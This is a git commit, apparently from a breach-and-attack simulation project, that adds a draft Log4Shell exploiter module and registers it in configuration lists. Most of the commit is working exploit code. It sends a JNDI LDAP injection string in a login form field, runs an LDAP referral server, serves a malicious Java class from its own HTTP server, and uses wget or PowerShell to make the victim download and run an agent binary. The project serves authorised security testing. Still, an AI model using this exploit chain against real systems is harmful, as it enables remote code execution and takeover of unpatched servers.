TEMP: base implementation of the log4shell

This commit is contained in:
vakarisz 2021-12-22 17:17:02 +02:00
parent fddaa16931
commit 41b97cb54a
3 changed files with 108 additions and 0 deletions

View File

@ -0,0 +1,98 @@
import http.client
import http.server
import logging
import requests
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.log4shell_utils import LDAPExploitServer, build_exploit_bytecode
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD, VictimHost
from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
logger = logging.getLogger(__name__)
LDAP_PAYLOAD = "${jndi:ldap://192.168.56.1:8080/dn=LinuxExploit}"
class Log4jExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"]
EXPLOIT_TYPE = ExploitType.VULNERABILITY
_EXPLOITED_SERVICE = "Log4j"
LDAP_PORT = 8080
CLASS_HTTP_SERVER_PORT = 1337
URLS = ["http://192.168.56.101:8080/login"]
def __init__(self, host: VictimHost):
super().__init__(host)
self._client = None
self._stop_http = True
def exploit_host(self):
paths = self.get_monkey_paths()
# Create server for http download and wait for it's startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
if not http_path:
logger.debug("Exploiter failed, http transfer creation failed.")
return False
logger.info("Started http server on %s", http_path)
commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
command = self.get_command(paths["dest_path"], http_path, commands)
java_class = self.build_java_class(command)
class_http_server_ip = get_interface_to_target(self.host.ip_addr)
self.start_java_class_http_server(class_http_server_ip, java_class)
ldap = LDAPExploitServer(
ldap_server_port=8080,
http_server_ip=class_http_server_ip,
http_server_port=self.CLASS_HTTP_SERVER_PORT,
storage_dir=get_monkey_dir_path(),
)
ldap.run()
payload = {"username": LDAP_PAYLOAD, "password": "m0nk3y"}
try:
requests.post(Log4jExploiter.URLS[0], data=payload, timeout=5)
except requests.ReadTimeout:
logger.error("Couldn't send request to the vulnerable machine")
return False
finally:
self._stop_http = True
ldap.stop()
return True
def build_java_class(self, exploit_command: str) -> bytes:
return build_exploit_bytecode(exploit_command)
def upload_monkey(self, url, commands=None):
pass
def exploit(self, url, command):
pass
class HTTPHandler(http.server.BaseHTTPRequestHandler):
java_class: bytes
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/octet-stream")
self.end_headers()
logger.info("Sending payload class!")
self.wfile.write(self.java_class)
def start_java_class_http_server(self, ip: str, java_class: bytes):
# TODO run this on a separate thread
self._stop_http = False
Log4jExploiter.HTTPHandler.java_class = java_class
server = http.server.HTTPServer(
(ip, Log4jExploiter.CLASS_HTTP_SERVER_PORT), Log4jExploiter.HTTPHandler
)
while not self._stop_http:
server.handle_request()

View File

@ -17,6 +17,7 @@ BASIC = {
"SmbExploiter", "SmbExploiter",
"WmiExploiter", "WmiExploiter",
"SSHExploiter", "SSHExploiter",
"Log4ShellExploiter",
"ShellShockExploiter", "ShellShockExploiter",
"SambaCryExploiter", "SambaCryExploiter",
"ElasticGroovyExploiter", "ElasticGroovyExploiter",

View File

@ -42,6 +42,15 @@ EXPLOITER_CLASSES = {
"link": "https://www.guardicore.com/infectionmonkey/docs/reference" "link": "https://www.guardicore.com/infectionmonkey/docs/reference"
"/exploiters/mssql/", "/exploiters/mssql/",
}, },
# TODO finish description
{
"type": "string",
"enum": ["Log4ShellExploiter"],
"title": "Log4Shell Exploiter",
"safe": True,
"info": "TODO: provide full info.",
"link": "TODO: link to docs",
},
{ {
"type": "string", "type": "string",
"enum": ["Ms08_067_Exploiter"], "enum": ["Ms08_067_Exploiter"],